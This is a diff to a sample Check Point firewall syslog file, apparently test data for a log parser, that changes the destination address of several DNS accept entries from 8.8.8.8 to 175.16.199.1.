-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45251"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42262"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36552"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39733"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43005"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45251"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42262"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60774"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44650"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36668"; service:"443"; service_id:"https"; src:"192.168.2.2"]
@@ -2577,63 +2577,63 @@
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d917,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61480"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10006"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57384"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.130"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34578"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59478"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44683"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59478"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44683"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x15,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.66"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48744"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x16,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.95"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50252"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x17,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43097"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x18,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"26"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x19,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"27"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x17,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43097"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
